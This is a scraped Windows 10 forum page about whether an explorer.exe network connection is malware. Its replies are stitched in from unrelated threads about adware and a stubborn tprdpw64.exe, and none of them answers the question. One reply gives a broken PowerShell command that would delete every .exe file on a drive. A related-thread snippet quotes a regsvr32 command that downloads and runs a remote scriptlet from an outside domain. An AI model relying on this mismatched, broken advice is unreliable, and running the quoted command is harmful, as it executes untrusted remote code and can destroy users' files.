Windows 10: explorer.exe , Is this Malware , and how i remove it ?

Discus and support explorer.exe , Is this Malware , and how i remove it ? in Windows 10 Software and Apps to solve the problem; explorer.exe 7900, DESKTOP-7K49I9T, 61804, 95.101.123.73, 443, TCP, Established,Is this Malware , and how i remove it ?i think its an process injection... Discussion in 'Windows 10 Software and Apps' started by Mahmoud Jalals, Mar 16, 2023.

  1. explorer.exe , Is this Malware , and how i remove it ?


    explorer.exe 7900, DESKTOP-7K49I9T, 61804, 95.101.123.73, 443, TCP, Established,Is this Malware , and how i remove it ?i think its an process injection malware , please if i am right , guide me how to remove it ?

    :)
     
    Mahmoud Jalals, Mar 16, 2023
    #1

  2. Best way to remove problem Malware

    Hi There,

    I am trying to remove a bundle of Malware without success.

    There is a bundle of listed programs which I try to uninstall through the typical Control Panel effort, but they remain listed there:

    Buenosearch Toolbar
    MyPC Backup
    PC Performer
    Speed Test 127
    UnknownFile

    I was looking at this weblink which provides a 5 step process for Buenosearch alone:
    http://malwaretips.com/blogs/remove-bueno-search/

    Not sure how much certain guides can be trusted. One of the first things I read was to download Revo Uninstaller, and I've not heard of it so I'm not sure if it's trustworthy..........
     
    radioraheem, Mar 16, 2023
    #2
  3. Malware tprdpw64.exe after installing 7zip

    Thank you for the reply and the suggestions. However neither link provided a working solution. I followed each set of instructions step by step, to the T, but the viruses are still there.

    I killed the processes with Rkill as instructed, and it found and ended the malware process `tprdpw64.exe`. It, however, did nothing
    about the adware `svcvmx` & `svcvmx client` processes. After doing so I downloaded and installed Zemana, as instructed, and let it do a full system scan. Might I add that this took over
    10 hours to complete, as I have 1,396,541 files on my PC, so this whole thing wasted nearly half a day of my time with no results.

    Zemana detected the malware virus `tprdpw64.exe` located at "C:\WINDOWS\System32\tprdpw64.exe"
    (among other, smaller "threats"), and labeled it as malware. After it finished the scan, it said it has placed all files into quarantine, including `tprdpw64.exe`.
    However, when checking the quarantine list `tprdpw64.exe` is
    not listed. I then decided to have Zemana remove the files in the
    quarantine list from my system and then rebooted my PC. It removed them all successfully, except for `tprdpw64.exe`
    which is still on my system, and still runs (I can still see it in task manager after rebooting). So the 10+ hours of waiting were all for nothing.

    I then used Zemana's "drag-and-drop" feature to re-scan just `tprdpw64.exe`
    (in order to not have to wait 10+ hours again). It scanned it, and now says the file is not a threat (but it clearly is).

    I then proceeded to step 2, using AdwCleaner to remove the adware. This did not work in the slightest. AdwCleaner did not detect the adware virus at all, and thus did nothing about it. I still cannot remove the viruses manually, either. However for some
    reason, the adware `svcvmx` & `svcvmx client` processes no longer seem to run (my PC has been on for about an hour, and the processes
    have yet to startup). However, even so the files are still on my file system and would like to delete them.

    EDIT

    I have just searched my registry, looking for any possible signs of tprdpw64 being listed, and there was nothing there.
     
    Jon Barrow, Mar 16, 2023
    #3
  4. explorer.exe , Is this Malware , and how i remove it ?

    Remove .exe files caused by malware

    You may do it easily with PowerShell, try open Windows PowerShell as administrator and type the following:

    Remove-Item f:\malware\* -include .exe

    Make in f:\malware\* add the name of the driver and folder and * is meaning all subfolders within the malware folder. if you want it within the driver you may write something like f:\* and -include .exe will remove all files with .exe extension.
     
    Cyber_Defend_Team, Mar 16, 2023
    #4
Thema:

explorer.exe , Is this Malware , and how i remove it ?

Loading...
  1. explorer.exe , Is this Malware , and how i remove it ? - Similar Threads - explorer exe Malware

  2. How to remove malware?

    in Windows 10 Gaming
    How to remove malware?: Just a couple of minutes ago, my system flagged a severe threat that I can't seem to remove no matter what I do. I've inserted the image. Is there any way to fix this? Thanks! I've been looking into using FRST but I need the fixlist.txt that seems to be unique to every...
  3. How to remove malware?

    in Windows 10 Software and Apps
    How to remove malware?: Just a couple of minutes ago, my system flagged a severe threat that I can't seem to remove no matter what I do. I've inserted the image. Is there any way to fix this? Thanks! I've been looking into using FRST but I need the fixlist.txt that seems to be unique to every...
  4. How to remove malware?

    in Windows 10 Gaming
    How to remove malware?: I recently downloaded an exe file and i am pretty sure i have a virus or malware on my pc now, every time i open my pc now i notice that the temperature is high for no reason and its sounds louder. The first thing i did is try to download an antivirus but every time i tried...
  5. How to remove malware?

    in Windows 10 Software and Apps
    How to remove malware?: I recently downloaded an exe file and i am pretty sure i have a virus or malware on my pc now, every time i open my pc now i notice that the temperature is high for no reason and its sounds louder. The first thing i did is try to download an antivirus but every time i tried...
  6. explorer.exe , Is this Malware , and how i remove it ?

    in Windows 10 Gaming
    explorer.exe , Is this Malware , and how i remove it ?: explorer.exe 7900, DESKTOP-7K49I9T, 61804, 95.101.123.73, 443, TCP, Established,Is this Malware , and how i remove it ?i think its an process injection malware , please if i am right , guide me how to remove it ?...
  7. How to remove this malware?

    in AntiVirus, Firewalls and System Security
    How to remove this malware?: For the past couple of days i keep getting this .exe file which is flagged as Trojan:win32/Tigrre!rfni did defender offline scan as well as try to delete it while booted on safemode with network, as well as manually removing it, quarantine and delete, but to no avail...
  8. regsvr32.exe as Malware

    in Windows 10 BSOD Crashes and Debugging
    regsvr32.exe as Malware: Hello Team, We are observing Malware as Cloud IOC: W32.COMScriptletAbuse.ioc from the file path C:\Windows\System32\regsvr32.exe /s /n /u /i:http://server2.aserdefa.ru/restore.xml scrobj.dll. Can we delete or Uninstall the file will it affect the OS. Please let me know...
  9. is Excelcnv exe malware?

    in AntiVirus, Firewalls and System Security
    is Excelcnv exe malware?: I have problems with my PC performance. Today I found a program file called excelcnv. I think it is malware but I am not sure. Can I delete this file? c:/programfiles(X86)/microsoftoffice/root/office16 Thank you....
  10. How to Remove Malware?

    in AntiVirus, Firewalls and System Security
    How to Remove Malware?: How do I delete malware in my system for pop-up with error code XLMR01F7985 [Original Title: Malware] https://answers.microsoft.com/en-us/protect/forum/all/how-to-remove-malware/d95f7517-97c9-43c4-bcc4-a5cce3a56ca7